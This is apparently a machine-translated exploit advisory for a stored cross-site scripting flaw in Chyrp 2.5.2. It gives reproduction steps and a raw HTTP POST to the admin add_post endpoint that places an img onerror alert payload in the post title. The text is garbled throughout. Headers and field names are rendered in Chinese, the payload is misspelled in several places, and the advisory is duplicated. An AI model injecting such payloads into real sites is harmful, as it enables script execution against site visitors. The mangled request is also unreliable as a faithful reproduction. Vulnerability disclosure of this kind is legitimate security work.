#CHYRP 2.5.2-存储的跨站点脚本(XS)
#日期: 2024-04-24
#利用作者: ahmetümitBayram
#供应商homepage3360 https://github.com/chyrp/
#软件link: https://github.com/chyrp/chyrp/chyrp/archive/refs/tags/v2.5.2.5.2.zip
#版本: 2.5.2
#在: MacOS上测试
###复制###的步骤
post/chyrp/admin/?action=add_post http/1.1
HOST: LOCALHOST
Cookie: Chyrpsession=C4194C16A28DEC03E449171087981D11;
show_more_options=true
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:124.0)
壁虎/20100101 Firefox/124.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,
/; q=0.8
Accept-Language: TR-TR,TR; Q=0.8,EN-US; Q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;
边界=--------------------------------- 28307567523233313132815561598
内容长度: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='title'
'img src=x OneError=alert('存储')
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='身体'
P1337/p
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='状态'
民众
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='slug'
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='create_at'
04/24/24 12:31:57
------------------------------------- 28307567523233313132815561598
content-disposition: form-data; name='onigral_time'
04/24/24 12:31:57
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='trackbacks'
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='羽毛'
文本
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='哈希'
11E11ABA15114F918EC1C2E6B8F8DDCF
---------------------------------------- 283075675232333313132815561598-
#日期: 2024-04-24
#利用作者: ahmetümitBayram
#供应商homepage3360 https://github.com/chyrp/
#软件link: https://github.com/chyrp/chyrp/chyrp/archive/refs/tags/v2.5.2.5.2.zip
#版本: 2.5.2
#在: MacOS上测试
###复制###的步骤
- 从地址登录: http://localhost/chyrp/?action=登录。
- 单击“写”。
- 将此有效载荷键入'title'field:'img src=x OneError=arter(alert)
- 填写“正文”区域,然后单击“发布”。
- 一条警报消息,说“存储”将出现在您面前。
post/chyrp/admin/?action=add_post http/1.1
HOST: LOCALHOST
Cookie: Chyrpsession=C4194C16A28DEC03E449171087981D11;
show_more_options=true
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:124.0)
壁虎/20100101 Firefox/124.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,
/; q=0.8
Accept-Language: TR-TR,TR; Q=0.8,EN-US; Q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;
边界=--------------------------------- 28307567523233313132815561598
内容长度: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='title'
'img src=x OneError=alert('存储')
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='身体'
P1337/p
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='状态'
民众
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='slug'
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='create_at'
04/24/24 12:31:57
------------------------------------- 28307567523233313132815561598
content-disposition: form-data; name='onigral_time'
04/24/24 12:31:57
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='trackbacks'
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='羽毛'
文本
------------------------------------- 28307567523233313132815561598
content-disposition: form-data;名称='哈希'
11E11ABA15114F918EC1C2E6B8F8DDCF
---------------------------------------- 283075675232333313132815561598-